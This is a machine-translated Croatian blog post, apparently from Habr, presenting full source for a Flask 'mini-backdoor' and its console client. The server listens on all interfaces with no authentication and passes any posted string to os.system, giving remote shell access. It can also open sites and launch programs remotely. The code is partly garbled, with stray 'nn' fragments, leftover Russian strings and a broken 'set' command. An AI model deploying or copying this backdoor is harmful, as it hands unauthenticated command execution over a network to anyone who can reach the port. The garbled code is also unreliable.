Hej Habr!
Nedavno sam gledao preuzetu verziju programskog toka "Kako stvoriti vlastitu web aplikaciju u Flasku." I odlučio sam konsolidirati svoje znanje u nekom projektu. Dugo nisam znao što napisati i sinula mi je ideja: "Zašto ne napraviti mini-backdoor u Flasku?"
U glavi su mi se odmah pojavile prve opcije za implementacije i mogućnosti backdoora. Ali odlučio sam odmah napraviti popis backdoor mogućnosti:
- Znati otvarati web stranice
- Imati pristup naredbenom retku
- Biti u mogućnosti otvoriti programe, fotografije, video zapise
Dakle, prvu je točku iznimno lako implementirati pomoću modula web-preglednika. Odlučio sam implementirati drugu točku pomoću os modula. I treći je također preko os modula, ali ja ću koristiti "linkove" (više o tome kasnije).
Pisanje poslužitelja
Dakle, *bubanj* sav kod poslužitelja:
from flask import Flask, request
import webbrowser
import os
import re
app = Flask(__name__)
@app.route('/mycomp', methods=['POST'])
def hell():
json_string = request.json
if json_string['command'] == 'test':
return 'The server is running and waiting for commands...'
if json_string['command'] == 'openweb':
webbrowser.open(url='https://www.'+json_string['data'], new=0)
return 'Site opening ' + json_string['data'] + '...'
if json_string['command'] == 'shell':
os.system(json_string['data'])
return 'Command execution ' + json_string['data'] + '...'
if json_string['command'] == 'link':
links = open('links.txt', 'r')
for i in range(int(json_string['data'])):
link = links.readline()
os.system(link.split('>')[0])
return 'Launch ' + link.split('>')[1]
if __name__ == '__main__':
app.run(host='0.0.0.0')
Već sam izbacio sav kod, vrijeme je da objasnim suštinu.
Sav kod se izvodi na lokalnom računalu na portu 5000. Za interakciju s poslužiteljem moramo poslati JSON POST zahtjev.
Struktura JSON zahtjeva:
{‘command’: ‘comecommand’, ‘data’: ‘somedata’}
Pa, ima smisla da je 'naredba' naredba koju želimo izvršiti. A 'podaci' su argumenti naredbe.
Možete ručno pisati i slati JSON zahtjeve za interakciju s poslužiteljem (zahtjevi će vam pomoći). Ili možete napisati klijent konzole.
Pisanje klijenta
Šifra:
import requests
logo = ['nn',
'****** ********',
'******* *********',
'** ** ** **',
'** ** ** ** Written on Python',
'******* ** **',
'******** ** **',
'** ** ** ** Author: ROBOTD4',
'** ** ** **',
'** ** ** **',
'******** *********',
'******* ********',
'nn']
p = ''
iport = '192.168.1.2:5000'
host = 'http://' + iport + '/mycomp'
def test():
dict = {'command': 'test', 'data': 0}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
def start():
for i in logo:
print(i)
start()
test()
while True:
command = input('>')
if command == '':
continue
a = command.split()
if command == 'test':
dict = {'command': 'test', 'data': 0}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
if a[0] == 'shell':
for i in range(1, len(a)):
p = p + a[i] + ' '
dict = {'command': 'shell', 'data': p}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
p = ''
if a[0] == 'link':
if len(a) > 1:
dict = {'command': 'link', 'data': int(a[1])}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
else:
print('Комманда не содержит аргументов!')
if a[0] == 'openweb':
if len(a) > 1:
dict = {'command': 'openweb', 'data': a[1]}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
else:
print('Комманда не содержит аргументов!')
if a[0] == 'set':
if a[1] == 'host':
ip = a[2] + ':5000'
if command == 'quit':
break
Objašnjenja:
Prije svega, uvozi se modul zahtjeva (za interakciju s poslužiteljem). Ispod su opisi funkcija pokretanja i testiranja. A onda ciklus u kojem se događa magija. Jeste li pročitali kod? Tako da razumijete značenje magije koja se događa u ciklusu. Unesite naredbu - ona se izvršava. Shell – naredbe za naredbeni redak (logika je izvan skale).
Test – provjeri radi li server (backdoor)
Veza – korištenje "prečaca"
Openweb – otvaranje web stranice
Quit – izlaz iz klijenta
Postavi – postavljanje IP adrese vašeg računala na lokalnoj mreži
A sada više o linku.
Pored poslužitelja nalazi se datoteka link.txt. Sadrži poveznice (puni put) do datoteka (videozapisi, fotografije, programi).
Struktura je ovakva:
полный_путь>описание
полный_путь>описание
Ukupan
Imamo backdoor server za kontrolu računala na lokalnoj mreži (unutar wi-fi mreže). Tehnički, možemo pokrenuti klijenta s bilo kojeg uređaja koji ima python tumač.
PS Dodao sam naredbu set tako da ako je računalu na lokalnoj mreži dodijeljena druga IP adresa, ona se može promijeniti izravno u klijentu.
Izvor: www.habr.com